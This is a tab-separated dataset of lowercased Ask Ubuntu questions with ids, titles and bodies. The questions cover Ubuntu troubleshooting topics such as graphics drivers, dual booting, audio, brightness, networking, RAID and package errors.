481413	how do i get brightness controls working on a sony vaio fit 15e ?	i have a dual boot with ubuntu 14.04 and windows , and i have a problem with brightness . when i increase brightness to 1 and i reboot the computer , it has come to be at maximum brightness . i 've tried after any reboot and when i start ubuntu i have to increase it again to 1 . why is it not saving the brightness setting for me ? i want to save the current value , not a fixed value . i added a related line echo 0 > /sys/class/backlight/intel_backlight/brightness and after rebooting it 's reset to the maximum again . my laptop model is vaio svf1521dcxw .
481414	install nvidia driver instead nouveau	3 days ago i got installed ubunto 14.04 and got some problems as fuzzy/blurry screen and bad support of multiple screens . so i realized that as default ubuntu install nouveau . i googled how to remove this driver and install nvidia driver . i found this guide : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates apt-get update then , you install the nvidia driver : apt-get install nvidia-current apt-get upgrade now that nvidia is installed , you need to blacklist the nouveau driver so it donât pop out when you will reboot . create or edit the following file : nano /etc/modprobe.d/blacklist-nouveau.conf âśand add these lines at the end : blacklist nouveau blacklist lbm-nouveau options nouveau modeset=0 alias nouveau off alias lbm-nouveau off i checked via the software & updates if nvidia driver got installed successfully and it display me now that the driver that is installed is nvidia 304.117 than i tried to run lshw -c video | 'configuration' and the result is that the driver is still nouveau . configuration : driver=nouveau latency=0
481417	laptop speaker disappeared from sound settings	i am using thinkpad t61 with ubuntu 14.04 . a few days ago i used my headphones for the first time after upgrading from 12.04 and got the sound to my headphones with not problem . however after i unplugged the headphones , i did n't get the sound back to the laptop speakers , and the output option for the laptop speakers disappeared from the sound settings . is this possibly a bug in the new ubuntu , or is it likely the problem with hardwares ? restarting the computer did n't help . thank you very much .
481423	new laptop , windows 8.1 , attempting dual install . ubuntu installer does n't 'see ' existing os	though i 've used ubuntu for a few years , i 'm new to installation . previously i had help and now i 'm doing it alone ( moved across the world ) . windows 8.1 came preinstalled on my new laptop ( toshiba satellite c70-a-17c - core i5 , 8 gb ram , 750 gb hdd ) . i have already followed a few steps i found online to prepare for a dual install ( with ubuntu 14.04 ) . i backed up windows , created a bootable ubuntu usb and dvd ( just in case one did n't work ) , turned off fast boot and secure boot , and shrunk c : / . the new unallocated drive portion is 292.97 gb . after shrinking c : / , i restarted windows a couple of times to make sure everything was working fine ( it is ) . i then attempted to install with the ubuntu live usb . however , the ubuntu installer does n't see that windows 8.1 is already installed . i do n't understand , and do n't want to mess with ubuntu partitioning when i do n't know where the partitions will be created . my concern is that , if i go further with the installation process , windows might be overwritten or compromised in some way . i then tried to reboot using the ubuntu live dvd , thinking i might get a different result . however , i ca n't figure out how to make the laptop boot from the cd drive . i went into the bios and found no option there , either . any help is very appreciated ! edit : looks like i ca n't link directly to each photo . here is my album of screenshots : http : //imgur.com/a/zchco here you can see that there 's no option to boot from cd drive , only usb . everything looks okay so far . i do n't understand this . ubuntu has not yet been installed . unmounting partitions ? ( i chose 'no ' . ) even though the laptop came pre-installed with windows 8.1 , the ubuntu usb installer ca n't see it . i chose 'something else ' . i need to pick and format partitions . i scrolled down and took a second shot to include all information . completely lost and cancelled installation .
481425	cursor moves when i tap the touchpad to click ( xorg.conf problem )	this may seem as a duplication of : synaptics touchpad - cursor moves around when just 'tapped ' after ubuntu 12.04 upgrade i tried that solution and it works ! setting the fingerhigh and fingerlow values really does the trick , but the xorg.conf file gets renamed to xorg.conf.xxxx ( xxxx being random numbers ) and then the values of fingerhigh and fingerlow are not the ones i chose anymore . any suggestion on how to make this xorg.conf file persistent ? thanks !
481428	search for odt files without indexing	i am looking for : a way to search inside odt files ( i.e . search for contents , not name ) that does not require any kind of indexing that is graphical and very user-friendly ( for a relatively old person , who does not like computers much ) i know that it is possible to have 1 ) and 2 ) : for x in `find . -iname '*odt'` ; do odt2txt $ x | grep query ; done works well enough , and it 's pretty fast . but i wonder if there is already a good solution that does this with a gui ( or can be adapted to do this easily )
481429	cron to email when a psql stops recording data	i have a psql setup and records data every 10 minute or less . the connection sometimes dies and it results is logging failure and i have no idea when that happens . i want to create a cron job to email me when this happens . can any one assist me . i have a code to check the age of the time-stamp on the table to return a value as number of hours . how can i set this cron up to notify email me when the age is > then a 15 minutes or 30 minutes ( user defines ) the sql script i figured out is select extract ( hours from ( age ( max ( t ) , current_timestamp ) ) ) from public.sensor_data ; please help
481440	ubuntu server alternately boots and hangs	i have what seems to be an odd error : my ubuntu server will alternate between booting into grub , and then proceeding to boot perfectly , and then on reboot , will not show grub , and will hang after printing `` begin : running /scripts/local-premount ... done . '' i have edited an unedited fstab , and have tried booting with and without external hard drives plugged in . again , i ca n't find any rhyme nor reason to this problem , other than when i boot successfully , and then shutdown/reboot , the computer hangs , at which point i have to force reboot , after which all is well and the cycle begins once more . i can post the full display of the boot screen on which it hangs if that would be of use . thanks .
481441	resolution problems ubuntu 14.04	i have ubuntu 14.04 and everything is working fine exept for the resolution , my monitor supports 1440x900 but in the options only allows 800x640 and 1024x768 , i tryed the xorg.conf solution and it does n't work edit : problem solved ! i installed the propietary drivers from the `` aditional drivers '' option and now works : d
481445	ubuntu 14.04 showing internal error	i am using lenovo b460e . i installed ubuntu 14.04 , and when i log in it is showing an error message 'sorry , ubuntu 14.04 has experienced an internal error ' . i reported many times but the window is constantly appearing . also , when i try to shutdown it gets stuck on the ubuntu logo .
481446	use ps3 remote on ubuntu	is there any type of driver software i need to install in order to get my ps3 remote to work on ubuntu to play steam games ? any suggestion would be great , thanks .
481451	hibernation error message on ubuntu 12.04	i have dell inspiron 15 and ubuntu 12.04 . during ubuntu hibernation i receive the following message : timed out waiting for dp idle patterns unknown unclaimed register before writing to 64040 notebook is still switching off , but waking up takes more and more time . what is this issue connected with ? is it serious ?
481453	set up ip in ubuntu 12.04 lts	i am trying to set ip 's for a wired connection in ubuntu via the network connections gui . however , in wired connections , when i select manual ipv4 settings the `` save '' button get greyed out and i ca n't update the new changes . ( ip , gateway , subnet and dns ) .. i have googled extensively and tried all the suggestions given . however it does not seem to work whatsoever . i have tried changing the /etc/network/interfaces file to set static ip for ethernet interface . still it does not work . i get the set ip details for the ethernet interface when i try - ifconfig /all . however i cant connect to the internet . can someone please help me to get this right ... .
481454	problem in installing xdman in ubuntu via terminal	i downloaded xdman in ubuntu via the terminal using the command , apt-get install xdman however upon downloading when i try to run xdman using the `` xdman '' command in the terminal i got error message as , java.io.filenotfoundexception : /home/shabirmean/.xdmconf ( no such file or directory ) at java.io.fileinputstream.open ( native method ) at java.io.fileinputstream. < init > ( fileinputstream.java:140 ) at org.sdg.xdman.core.common.xdmconfig.load ( xdmconfig.java:118 ) at org.sdg.xdman.gui.mainwindow.main ( mainwindow.java:2724 ) config port : 9614 xdm module running on : 9614 java.io.filenotfoundexception : /home/shabirmean/.xdmlist ( no such file or directory ) at java.io.fileinputstream.open ( native method ) at java.io.fileinputstream. < init > ( fileinputstream.java:140 ) at org.sdg.xdman.gui.downloadlist.loaddownloadlist ( downloadlist.java:169 ) at org.sdg.xdman.gui.downloadlist. < init > ( downloadlist.java:44 ) at org.sdg.xdman.gui.mainwindow.main ( mainwindow.java:2746 ) exception in thread `` main '' java.awt.headlessexception at java.awt.graphicsenvironment.checkheadless ( graphicsenvironment.java:173 ) at java.awt.window. < init > ( window.java:547 ) at java.awt.frame. < init > ( frame.java:419 ) at java.awt.frame. < init > ( frame.java:384 ) at javax.swing.jframe. < init > ( jframe.java:174 ) at org.sdg.xdman.gui.mainwindow. < init > ( mainwindow.java:166 ) at org.sdg.xdman.gui.mainwindow.main ( mainwindow.java:2748 ) can anyone please help me get past this ? ?
481456	my wired connection is not connecting	i gave my laptop to an it guy in my dorm cuz i could n't connect to the wireless in the new dorms i moved into . instead of fixing my laptop , he made it worse . now my wireless and wired is n't working . before i gave him my laptop , my ethernet was working fine . but now it just does n't connect . i tried it at different places . can anyone please help me . also let me know what output you guys need from terminal . i 'm on 12.04 lts . thanks a bunch
481457	dual boot windows 8 from a 12.04 install ?	i 've got a laptop with ubuntu 12.04 and i want to dual boot windows 8 with it . is this possible ? all tutorials i can find are for the other way around .
481459	thinkfan control does n't use the fan full potential when needed	i own a thinkpad x201 and is overheating very fast because of the environmental temperature and eventually kills himself without notice ( and it really grinds my gears ) . outside there are 34 degrees c while the computer rises its temperature at 80 with no important tasks and reaches ( with 1 deg each second ) to 100 degrees with a heavier task . i followed a guideline to start the fan earlier so it will maintain constant temperature or when is at a critical temperature to use the maximum speed but it still sticks to the auto values . the technical aspects the resource that i used is located here : http : //staff.science.uva.nl/~kholshei/thinkfan_guide/ i adjusted the values so that the fan would start on lower temperatures starting with 0 to 20 degrees for the level 0 and so on . my configuration for /etc/thinlfan.conf is : $ tail -n 15 /etc/thinkfan.conf sensor /sys/devices/virtual/hwmon/hwmon0/temp1_input sensor /sys/devices/platform/coretemp.0/temp4_input sensor /sys/devices/platform/coretemp.0/temp2_input ( 0 , 0 , 21 ) ( 1 , 20 , 22 ) ( 2 , 21 , 25 ) ( 3 , 24 , 28 ) ( 4 , 26 , 33 ) ( 5 , 30 , 40 ) ( 6 , 36 , 49 ) ( 7 , 44 , 62 ) ( 128 , 60 , 65 ) ( 129 , 63 , 100000 ) the last two values are experimental . when i run : $ sudo thinkfan -n warning : using default fan control in /proc/acpi/ibm/fan . when i run : $ echo level disengaged | sudo tee /proc/acpi/ibm/fan the fan spins at aprox . 6500 rpm which is actually effective ( the temperature drops slowly ) but it holds on this level for approximately 5 seconds after it switches back to auto . my question is : how can i manually set the fan speed to it 's full potential in these hot days / how can i adjust the values so that the temperature wo n't raise so much ? today is the first time when i try this , so do n't expect from me to have a clue of what can i try else than setting a cron job that would set the level on each second - which is an afoul idea . and the last thing : i ca n't afford to stop working and the most important i prefer changing the fan once in a while rather than the processor . thanks for your help and understanding , if you need any other detail let me know . oh ... here is my lsb_release : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy ... and uname : $ uname -r 3.11.0-23-generic
481460	trusty returns 404 for libxml2-dev	i am trying to install libxml2-dev for ubuntu 14.04 desktop , and a sudo apt-get install libxml2-dev returns a 404 : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : libxml2-dev 0 upgraded , 1 newly installed , 0 to remove and 12 not upgraded . need to get 628 kb of archives . after this operation , 2,927 kb of additional disk space will be used . err http : //in.archive.ubuntu.com/ubuntu/ trusty-updates/main libxml2-dev amd64 2.9.1+dfsg1-3ubuntu4.1 404 not found [ ip : 91.189.91.13 80 ] err http : //security.ubuntu.com/ubuntu/ trusty-security/main libxml2-dev amd64 2.9.1+dfsg1-3ubuntu4.1 404 not found [ ip : 91.189.92.200 80 ] e : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.9.1+dfsg1-3ubuntu4.1_amd64.deb 404 not found [ ip : 91.189.92.200 80 ] [ solved ] a sudo update before installing fixes this .
481462	how to recording movie from website ( screen desktop and sound capture ) ?	please show me the way on ubuntu to record screendesktop with sound not from microphone ( sound from movie/video on website ) - the same function with wm capture software on windows . thank so much
481466	ipsec saref does not work with l2tp kernel mode yet	xl2tpd -d echo : xl2tpd [ 7681 ] : enabling ipsec saref processing for l2tp transport mode sas xl2tpd [ 7681 ] : ipsec saref does not work with l2tp kernel mode yet , enabling forceuserspace=yes xl2tpd [ 7681 ] : init_network : unable to bind socket : address already in use . terminating . what should i do next ? i want to build a vpn server on my vps .
481469	is adding a user needs password	in my ubuntu after login by my user account , i want to create another user i intered bellow commands : adduser alex_2 -m i created new user , but when i want to login , ubuntu needs passwords and i did not gave that any password , as i mentioned i just typed adduser alex_2 -m. am i should set a password ? also i can not login even when i set password blank .
481474	install lubuntu 12.04 from windows xp	i want to install lubuntu 12.04 ( my pc do n't support more ) from windows xp without reboot system . how i can do this ? i heard something about wubi , but i am not sure from whre to download it . thanks !
481477	installing ubuntu gnome 14.04	i downloaded iso file but when i try to boot from usb it says bootmgr is missing . i can boot that iso file in virtual machine so i assume the file is ok . i had ubuntu 14.04 with unity installed but did n't like unity at all . i burned iso file to dvd but ca n't boot from that either , should i download the file again ? i have a very low speed connection . please help me to solve this . thanks .
481481	how to get permissions to a folder in an installation process ?	i am trying to install matlab in my personal computer running ubuntu 14.04 . the directory for installation is /usr/local/matlab/r2014a , on which i can get permissions using sudo when in the terminal . however , matlab has its own installation process which runs a wizard on independent windows . when i follow the wizard , i am not able to get access to that installation directory . does anyone know how to get such permissions for the installation ? thank you in advance .
481488	no dual-boot option after installing ubuntu 14.04 x64	i just finished installing ubuntu 14.04 x64 . it 's my first time with ubuntu , so i accepted all the defaults and installed it next to win8.1 x64 enterprise . when the installation finished , i rebooted , but i am now taken directly to windows with no option for the alternate os . windows advanced properties only lists windows as an available os . how do i enable ubuntu to boot ?
481492	speakers and headset not working	i need help . i 'm running ubuntu 14.04 and my volume mixer goes up , but , when i 'm playing a popular smash-hit game called minecraft , i get no sound on either device , which are my speakers and my headset . the microphone probably does n't work either . is there any way to fix this ? also , i have n't tried resetting pulseaudio as i do n't know the command .
481495	ubuntu 14.04 wont reboot after choosing nvidia drivers ( optimus laptop )	well i decided to give linux again a try . i was excited when i heard that ubuntu was supporting an alternative to bumblebee . but no luck today so far . the installation goes flawless , i open the utility that install alternative drivers , nvidia 331 , i think it is ... then i reboot as requested and thats it . the system wont be able to reboot , it is stuck at the gnome symbol at the very begining of the booting proccess , i forgot to mention i use ubuntu gnome . i have tried to install another choice that is listed , 331-updates , with the same luck i have tried also installing using the terminal , same . i would apreciate any help . i would really like to know how to revert the drivers to nouveau , because every time i have to try ... i am reinstalling the whole thing ! ! ! it is kinda embarasing , and time comsuming ! thanks folks !
481500	windows 8.1 erased ubuntu 14.04 partition	i had ubuntu 14.04 installed with a windows 7 dual boot . now , i 've just replaced w7 by windows 8 , but the ubuntu partition has disappeared ! running fdisk -l does n't show /dev/sda5 ( which was the ubuntu partition ) , if i access to gparted , it shows the ubuntu partition as `` empty space '' and from windows 8 's device manager , this partition also appears as empty space ! wtf has happened here ? has the partition been actually erased ?
481502	how to fix microphone and headphones configuration in ubuntu 12.04	i have a microphone and headphones plugged in on my hp laptop . i have been using them in skype for ages with ubuntu 12.04 . about one week ago , i noticed i can not phone with skype any more : i can hear but my microphone does not work . i have checked that the microphone is still working : it works under windows . before posting here i have read about 20 different questions and answers regarding this topic but , after trying many of the suggestions , i still do not understand what the problem is . here is a snapshot of my alsamixer : both the internal microphone and the capture column are active . i have checked for all possible muted checkboxes in both the unity system settings and in pavucontrol : everything i could find is not muted . i can hear perfectly when i play a video e.g . from youtube . i can also capture the sound from such a video using gtk-recordmydesktop . if i open pavucontrol i can see the sound signal under input devices - > monitor of built-in audio analog stereo . on the other hand , i can not record any sound from my microphone and , in pavucontrol , i do not see any signal under input devices - > built-in audio analog stereo - > line in . one week ago the microphone was working perfectly and i could use it with gtk-recordmydesktop . so it must be a configuration problem : it can not a hardware problem or some incompatibility . interestingly , if i run test sound from system settings - > output - > headphones - > settings for headphones - > test sound i can not hear anything . but at the same time if i listen to a piece of music ( which i can hear perfectly ) from youtube , pavucontrol shows a sound signal under output devices - > headphones . so , i am quite confused as to why different tools report different results for the same device . after reading all kind of posts and help pages for the last three days i am stuck . any suggestions to what i should check ?
481504	prevent a user using sudo	can we restrict a user and do not let him to go to the root mode . for example , when he inter sudo su , the system tells him you can not access the root ?
481506	vmnet1 host only network adapter	i need to copy the files from windows to ubuntu server and the server has only ssh client , no ssh server package installed . how can i do it ?
481509	lightdm does not start automatically	when booting lubuntu 14.04 , a terminal screen is shown instead of the usual graphical log-in screen . then , i have to type sudo lightdm and use ctrl+alt+f7 to switch to the graphical log-in screen . i checked cat /etc/x11/default-display-manager as described on http : //askubuntu.com/a/84485/288322 ; this included /usr/sbin/lightdm already . i also did as described on http : //askubuntu.com/a/457694 ; that works fine . how can i repair the system so that it automatically boots the graphical log-in screen again ?
481514	install another distro from an iso while live booted into a different one	for whatever reason when i try to boot into linux mint 17 from a live usb , i get a black screen with nothing on it after choosing which option to boot from ( regular vs compatability ) . i suspect it 's due to my optimus/nvidia card . however , xubuntu 14.04 works . what i want to do is boot into a xubuntu drive and install mint onto my ( unmounted ) hard drive from an iso . i realize mint may not work once this is done , but i want to give it a shot . is this possible ?
481515	raid : how to address the error on `` -- remove '' ?	i first stop the raid array , % mdadm -- stop /dev/md127 mdadm : stopped /dev/md127 then do a check , % mdadm -- detail -- scan ... the array is no longer shown . then i do remove % mdadm -- remove /dev/md127 mdadm : error open /dev/md127 : no such file or directory is there any way to avoid this error ? thanks a lot .
481517	run script full screen in terminal	how do i get a bash script to run in full screen when it 's executed or how can i change the terminal size if i ca n't make it full screen ?
481525	python executable upon double click	i know how to make a python script run using the terminal to open it . i would like to know how to open in the terminal upon a double click .
481526	errors were encountered while processing gdk-pixbuf-psd	i 'm getting this error whenever i 'm installing/removing or anything else using dpkg ... errors were encountered while processing : gdk-pixbuf-psd e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried : sudo dpkg -r logmein-client sudo apt-get install -f none of them worked . also tried to remove it using synaptics package manager , but the same error happens . what should i do to get rid of it ? edit : full log for running sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 12 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up gdk-pixbuf-psd ( 20081217 ) ... /var/lib/dpkg/info/gdk-pixbuf-psd.postinst : 23 : /var/lib/dpkg/info/gdk-pixbuf-psd.postinst : can not create /usr/lib/gtk-2.0/2.10.0/loader-files.d/gdk-pixbuf-psd.loaders : directory nonexistent /var/lib/dpkg/info/gdk-pixbuf-psd.postinst : 23 : /var/lib/dpkg/info/gdk-pixbuf-psd.postinst : gdk-pixbuf-query-loaders : not found dpkg : error processing package gdk-pixbuf-psd ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : gdk-pixbuf-psd e : sub-process /usr/bin/dpkg returned an error code ( 1 )
481531	where to find command in ubuntu 14.04 to mount the ntfs partition when clicked on the icon ?	my question seems to be related to auto mount partition when login , but it is more of learning about the inner command used by ubuntu os for mounting the drive when the icon is clicked . so , my question is : where to find that command which is used by ubuntu to mount the partition shown as icon in unity ? where to configure the options of the same so that it can mount with executable permissions ? i think , if the above questions get answered , can i use the same for startup application command ? so that i need not to change any settings where i have hard coded the location of the partition .
481532	youtube videos are flickering on chrome	i am using a lenovo ideapad u430p with ubutu 14.04 lts . there is a geforce gt 730m built in and there are also some drivers available : nvidia binary driver - version 331.38 from nvidia-331 ( proprietary , tested ) nvidia binary driver - version 331.38 from nvidia-331-updates ( proprietary ) x.org x server - nouveau display driver from xserver-xorg-video-nouveau ( open source ) whichever driver i use , video in chrome are flickering on fast movement . it seems that the screen is cut in half for a few milliseconds . i tried enable/display override software rendering list at chrome : //flags/ but it changes nothing . any advice ?
481533	ati hd5450 w/ ubuntu 14 ?	so , i 'm running ubuntu 12.04 right now . last night i realised that i 'm way behind as we 're up to 14 ! decided to run the updater and figured i 'd take the path of least resistance ( but lengthy choice ) of going 12.04 - 12.10 - 13.xx - 14.xx . so i download the first packet and then get an error message about my graphics card perhaps not working in 12.10 . now part of the reason i was looking to upgrade is because i get ( and have always had ) this strange occasional flickering - now that i have two screens it 's just on the second monitor ... ..oddly this is not the same port that was giving issues before ) . the graphics card is an ati radeon hd5450 and i have the catalyst ( i think it 's 13 or 14 ) driver installed - last night . it could be that the graphics card has never worked properly ... i bought the pc new and with an `` upgraded '' video card and it 's always suffered with this flicker . i just figured that the drivers were n't right or something . so i have 3 questions : 1 ) is my video card broken or is the driver letting it down and causing the flicker ? 2 ) will it be able to handle the upgrade to 14 via 13 ? or should i cut my losses and get something newer ? 3 ) if i should get something newer ... .what should i get ( thanks in advance ... .
481536	how to hide close , min , max buttons on ubuntu 14 04 unity top panel for maximised windows that do not have focus ?	if i have an unmaximised window with focus on top of a maximised window , the close , min , max buttons of the unfocused maximised window below are still shown in the unity top panel in ubuntu 14.04 . i have enabled menus in title bar for unmaximised windows ( locally integrated menus ) . is it possible to hide close , min , max buttons on the top panel for maximised windows that do not have focus ( without disabling locally integrated menus ) ? i have not found anything in the unity tweak tool , compiz ( ccsm ) settings or dconf . the only way i have found is to disable locally integrated menus , which i do n't want to do .
481538	`` the system is running in low-graphics mode '' error when i try ubuntu without installing because i need to run boot-repair	last time i was using ubuntu/linux it was almost 3 years ago and i have to admit i was never good at it . today i decided to try again ( 14.04 lts ) with my newly-bought acer laptop with windows 8.1 installed . this time i still have problem : after the installation ( i did n't select try ubuntu without installing in the boot screen . instead , i selected install ubuntu directly ) and reboot , as many articles suggest , i still went to the windows 8 directly . and i need to run boot-repair tool to make a correct grub . i assume it means i should run `` try ubuntu without installing '' to get to the desktop session , is it right ? but as my title suggests , after i click `` try ubuntu '' , i get this seemingly-famous error the system is running in low-graphics mode . so then i googled the solution to that . since i have a ati graphic card , many suggest to run sudo apt-get install fglrx in recovery mode then it should be ok. well , obviously i do n't have a recovery mode so i just hit alt+ctrl+f1 and run the command then reboot . but it did n't help . i do n't know if this is because i am not running the actual os and so the fglrx did n't really have any effect after the reboot . i feel i am having a contradiction : in order to fix the `` low-graphics '' error , i need a actual running os on the disk . but in order for the os from disk to run , i need to have a live desktop session to run boot-repair at first . anybody can help me ? thanks in advance ! update : my laptop hardware spec is like this : acer aspire e1 572g-54208g1t with intel i5 4200u cpu , 8gb ram , 1tb hard drive and ati radeon 8760m graphic . i read it somewhere the graphic is intel/ati hybrid . and after some further search , it seems the bios i have ( i do n't know why it is not uefi ) is a locked version of insydeh20 , which does n't have to much to modify . and i ca n't find the config to disable ati graphic temporarily .
481539	xubuntu 14.04 lightdm stalls after install of nis nfs and reboot	after a clean 14.04 install of xubuntu i went on to add nis and nfs for remote access to the server . however , on reboot the system gets to the lightdm greeter and stalls ( the consoles at alt-f1 etc are dead as well ) . the only solution is to go to recovery and un-install nis/nfs . the system then boots ok . i seem to remember there was a problem of networking not being started early enough in the boot process which plagued the first upstart versions of ubuntu ? if so can anyone help me to resolve this as i ca n't find the fix ?
481544	ubuntu maas dns node not connected to internet	i have a ubuntu maas region and cluster controller on one server . it is running dhcp server as well . maas cluster interface - `` manage dhcp and dns '' did not start a dhcp server . so , i had to manually configure isc dhcp server . i am trying to add a new node via pxe boot - it gets ip address from dhcp server , boots from maas image..but for some reason its not connected to internet . `` ping google.com '' fails . any suggestion that can help me diagnose the problem would be very useful . thanks
481545	no `` space '' on gnome-panel to alt+click to get the gnome-panel menu -- can only get menus for applets	am on ( k ) unbuntu 12.04.4 using `` gnome-classic ( no effects ) '' environment . i have one panel bar at top of screen , and when i 've run several general applications ( firefox , konsole , tbird , etc ) , their task widgets plus the usual menu buttons and such take up all the space in the panel and i can only get individual applets ' `` move , remove '' menu when i alt+rightclick . that is , i ca n't get to the panel menu containing `` add to panel '' any way to configure the panel such that 's there a guaranteed ( small ) space available to get to the panel 's own menu so i can further configure ( eg add/remove applets ) the panel itself ? thanks , =jeffh update : if one has only a few windows open such that the `` windows list '' panel applet is n't `` filled up '' , then alt+right-click in the empty space in that applet will yield a menu with `` add to panel '' , `` properties '' , etc menu items for the panel itself . [ this is a poor workaround for me since i may have a bunch of apps opened that i do n't wish to close to simply make a tweak to the panel ]
481546	display problems running ubuntu 12.04 in windows vmware player	i am posting this again because i have changed to vmware player and i discovered something new . i am running ubuntu 12.04 lts ( guest ) in vmware player 6.0.2 on windows 7 64-bit host . i have vmware tools installed properly . i am running mate but the problem persists when i change ( to and from ) xfce , gnome , mate a -- and back again i had been using this for a couple of years without any graphics issues . after an ubuntu update ( typical ) -- my video is corrupt and will not refresh correctly . my desktop icons are `` mirrored '' and when i open a terminal window ( for instance ) -- sometimes -- the window appears multiple times . of course , only one is the real image . it seems to be a refresh problem . when i move an active window around the screen the `` older '' images `` erase '' and my icons ( for instance ) are in the correct location . for instance , i can move the terminal around a pretty corrupted window and the screen behind it is repainted correctly . new : next , i got the idea to try and remote desktop in to the ubuntu 12.04 lts guest os from my windows 7 64-bit host . once working , and connected via win rdc -- using mate as default in my /etc/xrdp/startws.sh -- my video is not corrupted and works fine ( as in the past ) . any ideas about what is going on ? or how to fix this ?
481547	subwoofer not working in dell inspiron 7720	could someone help me turn the built-in subwoofer on ? i have dell inspiron 7720 laptop and ubuntu 14.04 . my sound settings : http : //i.imgur.com/jhdya6d.png lspci | grep -i `` audio device '' 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) cat /proc/asound/card0/codec* | grep codec codec : idt 92hd91bxx codec : intel pantherpoint hdmi can someone help me ?
481548	black screen after nvidia driver 331.79 install	all the other answers do not help , so i decided to do this . i have a geforce 780 ti and whenever i install graphics drivers i restart and boots up , and then it says loading failsafe graphics driver [ fail ] and i do not even get to see the login screen . it just goes black screen with a orange underscore flashing , also ctrl+alt+f1-f7 does not work .
481549	external pcie usb 3.0 controller nec corporation upd720200 not recocnized since the upgrade to 14.04	i use an external usb 3.0 pcie card . it used to work like a charm on 13.10 . but ever since the upgrade to 14.04 hot-plug does n't seem to work any more . it used to work before . only when this card is plugged in a boot it 's working . dmesg shows : 03:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) when plugged in during operation i only get some message that a hot-plug event took place . other than that nothing happens . any idea why ? edit 2014-06-14 : i have been searching up and down the /var/log folder . seems to me , the kernel does n't recognize the card at all during hot-plug boot with pcie external card installed lspci command : 03:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) /var/log/dmesg : [ 1.314043 ] xhci_hcd 0000:03:00.0 : xhci host controller [ 1.314049 ] xhci_hcd 0000:03:00.0 : new usb bus registered , assigned bus number 3 [ 1.314343 ] xhci_hcd 0000:03:00.0 : irq 42 for msi/msi-x [ 1.314350 ] xhci_hcd 0000:03:00.0 : irq 43 for msi/msi-x [ 1.314356 ] xhci_hcd 0000:03:00.0 : irq 44 for msi/msi-x [ 1.314362 ] xhci_hcd 0000:03:00.0 : irq 45 for msi/msi-x [ 1.314369 ] xhci_hcd 0000:03:00.0 : irq 46 for msi/msi-x [ 1.314544 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.314546 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.314548 ] usb usb3 : product : xhci host controller [ 1.314549 ] usb usb3 : manufacturer : linux 3.13.0-30-generic xhci_hcd [ 1.314551 ] usb usb3 : serialnumber : 0000:03:00.0 [ 1.314658 ] hub 3-0:1.0 : usb hub found [ 1.314672 ] hub 3-0:1.0 : 2 ports detected [ 1.314742 ] xhci_hcd 0000:03:00.0 : xhci host controller [ 1.314746 ] xhci_hcd 0000:03:00.0 : new usb bus registered , assigned bus number 4 [ 1.317621 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0003 [ 1.317622 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.317624 ] usb usb4 : product : xhci host controller [ 1.317625 ] usb usb4 : manufacturer : linux 3.13.0-30-generic xhci_hcd [ 1.317627 ] usb usb4 : serialnumber : 0000:03:00.0 [ 1.317700 ] hub 4-0:1.0 : usb hub found [ 1.317713 ] hub 4-0:1.0 : 2 ports detected /var/log/sys.log : ( kernal message when plugging in an external usb 3.o harddisk ) jun 14 15:19:09 marina711 kernel : [ 403.002797 ] usb 4-1 : new superspeed usb device number 2 using xhci_hcd jun 14 15:19:09 marina711 kernel : [ 403.020710 ] usb 4-1 : parent hub missing lpm exit latency info . power management will be impacted . jun 14 15:19:09 marina711 kernel : [ 403.023650 ] usb 4-1 : new usb device found , idvendor=0480 , idproduct=a00d jun 14 15:19:09 marina711 kernel : [ 403.023661 ] usb 4-1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 jun 14 15:19:09 marina711 kernel : [ 403.023667 ] usb 4-1 : product : external usb 3.0 jun 14 15:19:09 marina711 kernel : [ 403.023672 ] usb 4-1 : manufacturer : toshiba jun 14 15:19:09 marina711 kernel : [ 403.023677 ] usb 4-1 : serialnumber : 23183a26b28e jun 14 15:19:09 marina711 mtp-probe : checking bus 4 , device 2 : `` /sys/devices/pci0000:00/0000:00:1c.2/0000:03:00.0/usb4/4-1 '' jun 14 15:19:09 marina711 mtp-probe : bus : 4 , device : 2 was not an mtp device jun 14 15:19:09 marina711 kernel : [ 403.047210 ] usb-storage 4-1:1.0 : usb mass storage device detected jun 14 15:19:09 marina711 kernel : [ 403.047466 ] scsi6 : usb-storage 4-1:1.0 jun 14 15:19:09 marina711 kernel : [ 403.047575 ] usbcore : registered new interface driver usb-storage jun 14 15:19:13 marina711 kernel : [ 406.305836 ] scsi 6:0:0:0 : direct-access toshiba external usb 3.0 5438 pq : 0 ansi : 6 jun 14 15:19:13 marina711 kernel : [ 406.306478 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 jun 14 15:19:13 marina711 kernel : [ 406.307703 ] sd 6:0:0:0 : [ sdc ] 1953525164 512-byte logical blocks : ( 1.00 tb/931 gib ) jun 14 15:19:13 marina711 kernel : [ 406.308102 ] sd 6:0:0:0 : [ sdc ] write protect is off jun 14 15:19:13 marina711 kernel : [ 406.308106 ] sd 6:0:0:0 : [ sdc ] mode sense : 23 00 00 00 jun 14 15:19:13 marina711 kernel : [ 406.308805 ] sd 6:0:0:0 : [ sdc ] write cache : enabled , read cache : enabled , does n't support dpo or fua jun 14 15:19:13 marina711 kernel : [ 406.317164 ] sdc : sdc1 jun 14 15:19:13 marina711 kernel : [ 406.344720 ] sd 6:0:0:0 : [ sdc ] attached scsi disk /var/log/udev : udev [ 4.174356 ] add /devices/pci0000:00/0000:00:1c.2/0000:03:00.0 ( pci ) action=add devpath=/devices/pci0000:00/0000:00:1c.2/0000:03:00.0 driver=xhci_hcd id_model_from_database=upd720200 usb 3.0 host controller 